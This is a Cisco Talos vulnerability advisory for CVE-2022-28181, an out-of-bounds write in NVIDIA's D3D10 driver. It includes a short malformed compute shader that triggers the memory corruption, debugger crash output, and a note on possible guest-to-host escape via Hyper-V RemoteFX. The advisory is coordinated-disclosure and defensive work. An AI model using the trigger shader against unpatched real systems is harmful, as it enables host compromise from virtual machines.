Talos Vulnerability Report

TALOS-2021-1435

NVIDIA nvwgf2umx_cfg.dll shader DCL_INDEXABLE memory corruption vulnerability

May 17, 2022
CVE Number

CVE-2022-28181

Summary

A memory corruption vulnerability exists in the shader dcl_indexable functionality of NVIDIA D3D10 Driver version 496.76, 30.0.14.9676. A specially-crafted executable / shader file can lead to memory corruption. This vulnerability potentially could be triggered from guest machines running virtualization environments (i.e. VMware, qemu, VirtualBox etc.) in order to perform guest-to-host escape, as it was demonstrated before (TALOS-2018-0533, TALOS-2018-0568, etc.). Theoretically this vulnerability could be also triggered from web browser (using webGL and webassembly).

Tested Versions

NVIDIA D3D10 Driver 496.76, 30.0.14.9676

Product URLs

D3D10 Driver - https://nvidia.com

CVSSv3 Score

8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-787 - Out-of-bounds Write

Details

NVIDIA Graphics drivers is software for NVIDIA Graphics GPU installed on the PC. It is used to communicate between the operating system and the GPU device. This software is required in most cases for the hardware device to function properly.

We were able to trigger this vulnerability from HYPER-V guest using the RemoteFX feature, leading to executing the vulnerable code on the HYPER-V host (inside of the rdvgm.exe process). While the RemoteFX was recently deprecated by Microsoft, some older machines may still use this software (for example, those running an older version of Windows Server).

This vulnerability can be triggered by supplying a malformed compute shader. This leads to a memory corruption problem in NVIDIA driver.

When accessing the x temporary register outside of the defined size (normally defined by dcl_indexable instruction, which declares an indexable, temporary register) it is possible to cause arbitrary memory write.

Sample shader:

cs_5_0
dcl_global_flags refactoringAllowed
dcl_input vThreadGrouID.xy
dcl_input vThreadID.xy
dcl_temps 4
dcl_indexable_temp x0[32], 4
mov x0[v0.w].x, l(1.1)

Debugger output:

00007ffb`12f6cb2b 48890417        mov     qword ptr [rdi+rdx],rax ds:baadf00d`0000000a=????????????????
0:012> r
rax=0000000000000000 rbx=0000000000000000 rcx=000001e3baa206c8
rdx=baadf00d0000000a rsi=000001e3baa206a8 rdi=0000000000000000
rip=00007ffb12f6cb2b rsp=0000001e96feeb20 rbp=0000000000000000
 r8=000000000000000a  r9=000000000000000a r10=00000000811c9dc5
r11=0000000000000001 r12=0000000000000003 r13=0000000000000004
r14=000001e3baa1a7b0 r15=0000001e96feec68

Crash Information

0:012> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Unable to verify checksum for POC_EXEC11.exe

KEY_VALUES_STRING: 1

	Key  : AV.Fault
	Value: Read

	Key  : Analysis.CPU.Sec
	Value: 0

	Key  : Analysis.DebugAnalysisProvider.CPP
	Value: Create: 8007007e on IAMLEGION

	Key  : Analysis.DebugData
	Value: CreateObject

	Key  : Analysis.DebugModel
	Value: CreateObject

	Key  : Analysis.Elapsed.Sec
	Value: 51

	Key  : Analysis.Memory.CommitPeak.Mb
	Value: 77

	Key  : Analysis.System
	Value: CreateObject

	Key  : Timeline.OS.Boot.DeltaSec
	Value: 78046

	Key  : Timeline.Process.Start.DeltaSec
	Value: 44


NTGLOBALFLAG:  470

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffb12f6cb2b (nvwgf2umx!NVDEV_Thunk+0x0000000000358eeb)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000000
   Parameter[1]: ffffffffffffffff
Attempt to read from address ffffffffffffffff

FAULTING_THREAD:  00002fb8

PROCESS_NAME:  POC_EXEC11.exe

READ_ADDRESS:  ffffffffffffffff 

ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si  do pami ci pod adresem 0x%p. Pami   nie mo e by  %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000000

EXCEPTION_PARAMETER2:  ffffffffffffffff

STACK_TEXT:  
0000001e`96feeb20 00007ffb`12f9daf7 : 00000000`00000000 00000000`00000004 00000000`00000000 00000000`00000002 : nvwgf2umx!NVDEV_Thunk+0x358eeb
0000001e`96feec00 00007ffb`12f9f6e1 : 00000000`00000000 00000000`0000000c 00000000`000000a6 00000001`00000021 : nvwgf2umx!NVDEV_Thunk+0x389eb7
0000001e`96feece0 00007ffb`12f6ed18 : 00000000`00000011 00000000`00000001 0000001e`96feef10 000001e3`ba8f6750 : nvwgf2umx!NVDEV_Thunk+0x38baa1
0000001e`96feed90 00007ffb`12f6e6fa : 000001e3`40000011 00000000`40000011 00000000`00000011 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x35b0d8
0000001e`96feee10 00007ffb`12f32392 : 000001e3`baa0dc68 000001e3`b1546dd0 000001e3`baa02f28 000001e3`b1546dd0 : nvwgf2umx!NVDEV_Thunk+0x35aaba
0000001e`96feef50 00007ffb`12f5136c : 00000000`00000000 000001e3`b1a5e058 000001e3`baa02b90 00000000`00000001 : nvwgf2umx!NVDEV_Thunk+0x31e752
0000001e`96feefb0 00007ffb`12f2e90a : 00000000`00000000 00000000`00000000 000001e3`b1a5e058 00007ffb`12cb54bd : nvwgf2umx!NVDEV_Thunk+0x33d72c
0000001e`96fef2a0 00007ffb`12991f1a : 000001e3`b1a5e058 000001e3`b1a5e040 000001e3`b1a5e040 00000000`00000019 : nvwgf2umx!NVDEV_Thunk+0x31acca
0000001e`96fef2e0 00007ffb`12dc593a : 00000000`00000000 000001e3`b1a5ed40 000001e3`b1a5ed40 0000001e`96fef398 : nvwgf2umx+0x61f1a
0000001e`96fef320 00007ffb`12b861a9 : 0000001e`96fef461 00000000`00000000 000001e3`b5f34a80 0000001e`96fef960 : nvwgf2umx!NVDEV_Thunk+0x1b1cfa
0000001e`96fef3d0 00007ffb`12b58549 : 00000000`00000000 000001e3`b1a5dba0 00000000`00000000 0000001e`96fef960 : nvwgf2umx!NVENCODEAPI_Thunk+0x11cf89
0000001e`96fef470 00007ffb`129ec62a : 000001e3`b1b926f0 000001e3`b1b926f0 0000001e`96fef5c0 0000001e`96fef960 : nvwgf2umx!NVENCODEAPI_Thunk+0xef329
0000001e`96fef4c0 00007ffb`12d808e5 : 00000000`00000000 000001e3`b1b75980 00000000`00000000 00000000`00000000 : nvwgf2umx+0xbc62a
0000001e`96fef930 00007ffb`12d80698 : 00000000`00000000 000001e3`b5f59300 00000000`00000000 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x16cca5
0000001e`96fefa40 00007ffb`12e9f87c : 000001e3`b1a78440 00000000`00000000 000001e3`b1a78440 00000000`fffffff1 : nvwgf2umx!NVDEV_Thunk+0x16ca58
0000001e`96fefaf0 00007ffb`13c18d58 : 00000000`00000000 00000000`00000000 000001e3`b1b70e20 00000000`00000000 : nvwgf2umx!NVDEV_Thunk+0x28bc3c
0000001e`96fefb40 00007ffb`64e67034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx!OpenAdapter12+0x5b2f48
0000001e`96fefb70 00007ffb`65b02651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0000001e`96fefba0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


SYMBOL_NAME:  nvwgf2umx!NVDEV_Thunk+358eeb

MODULE_NAME: nvwgf2umx

IMAGE_NAME:  nvwgf2umx.dll

STACK_COMMAND:  ~12s ; .cxr ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_nvwgf2umx.dll!NVDEV_Thunk

BUCKET_ID_MODPRIVATE: 1

OS_VERSION:  10.0.19041.1

BUILDLAB_STR:  vb_release

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

FAILURE_ID_HASH:  {dd25751c-f187-50b1-f643-86818a26af0d}

Followup:     MachineOwner
---------

Timeline

2022-01-13 - Vendor Disclosure
2022-05-16 - Vendor Patch Release
2022-05-17 - Public Release

Credit

Discovered by Piotr Bania of Cisco Talos.